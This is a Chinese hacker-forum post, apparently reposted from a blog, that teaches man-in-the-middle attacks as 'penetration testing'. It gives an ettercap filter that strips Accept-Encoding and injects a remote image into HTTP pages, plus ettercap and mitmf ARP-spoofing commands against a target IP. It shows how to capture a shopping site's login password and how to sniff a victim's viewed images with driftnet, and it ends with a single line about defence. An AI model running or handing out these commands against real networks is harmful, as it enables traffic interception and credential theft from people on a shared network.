跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

中间人攻击在渗透测试中的利用

精选回复

发布于

工具介绍

  • ettercap
  • mitmtf
  • 3070网卡(大力推荐)

    ettercap进行中间人攻击

    替换图片

    先利用vim新建一个 kali.filter
    写入下面代码并保存

    if (ip.proto == TCP && tcp.dst == 80) {
     if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!"); 
        #note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
     }
    }
    if (ip.proto == TCP && tcp.src == 80) {
     replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
     replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
     msg("Filter Ran.\n");
    }

    将其转变为二进制文件

    etterfilter kali.filter -o kali.ef

    执行命令

    ettercap -T -q -F ig.ef -M ARP /目标ip///

    效果如下
    QQ截图20190308154552.png

    mitmf操作

    替换网页中的图片

    首先在root下创建一个img的文件夹,在文件夹中放入图片。
    执行命令

    python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img

    PS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。
    访问某宝效果如下:
    某宝效果

    获取某宝登录密码

    python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202

    登录密码

    将所有的图片选择180°

    python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet

    旋转
    其他命令可以参考官网,这里不在演示。

    嗅探浏览的图片

    在通过ettercap进行中间人攻击后,我们可以利用driftnet来获取对方浏览的图片。命令如下:

    driftnet -i waln0

    防御

    可以在路由器防火墙中开启arp攻击,来防御中间人攻击。
    防御

    mitmf安装

    参考文章:


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/825.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。